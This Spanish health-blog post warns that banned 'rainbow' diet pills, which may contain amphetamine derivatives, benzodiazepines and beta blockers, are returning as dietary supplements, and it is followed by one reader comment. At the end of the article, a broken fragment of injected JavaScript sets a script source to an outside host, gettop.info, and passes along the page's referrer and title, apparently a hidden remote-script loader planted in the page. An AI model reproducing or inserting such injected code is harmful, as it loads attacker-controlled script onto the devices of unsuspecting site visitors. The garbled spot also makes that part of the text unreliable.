Salud y belleza » Dieta, Productos peligrosos, Salud

Cuidado con los tratamientos para perder peso: las píldoras rainbow

1 Comentario

La obsesión de la sociedad desarrollada por conseguir la delgadez “ideal” ha llevado a muchas personas a acudir a tratamientos para perder peso que no siempre son aconsejables. La Sociedad Española para el Estudio de la Obesidad en España (SEEDO) ha alertado del riesgo de tomar esos tratamientos ya que se ha detectado que hay suplementos dietéticos que en realidad tienen detrás productos o pastillas que ya fueron prohibidos hace años.

pildoras-rainbow

Se las denomina píldoras “rainbow” o arcoíris porque estas pastillas para adelgazar tienen colores muy brillantes. Estos productos se retiraron del mercado en España hacia los 90 y en Estados Unidos en los 70 por su peligrosidad. Pero parece que de nuevo estas píldoras han vuelto convertidas en suplementos dietéticos que intentan eludir las leyes.

Son productos que aseguran tener efectos fáciles y rápidos para perder peso gracias a la combinación de múltiples sustancias que son supuestamente naturales. Normalmente no se comercializan como fármacos convencionales, sino que lo hacen, por ejemplo, a través de Internet o por anuncios publicitarios y en la prensa escrita para ganar credibilidad.

pildoras-arcoirisEstas píldoras “rainbow” son muy peligrosas porque podrían contener anoréxicos muy potentes derivados de anfetaminas con benzodiacepinas, bloqueadores betas y demás productos peligrosos y nocivos para el organismo. Esto puede llegar a causar graves efectos secundarios e incluso la muerte. Se han detectado ya varios casos de problemas cardiovasculares, renales o endocrinos relacionados con estos productos.

Por eso es recomendable que quienes quieran perder peso primero consulten a su médico qué medicamentos o suplementos alimenticios podrían tomar porque si se toman alguno de los fraudulentos podría tener graves consecuencias.

¿Has probado alguna vez estas pastillas?} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , , ,

One Comment »

  • Francisca said:

    Yo no conozco esas píldoras pero en mi opinión lo mejor para adelgazar es hacer ejercicio y comer sano. y, sobre todo, ser constante…

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.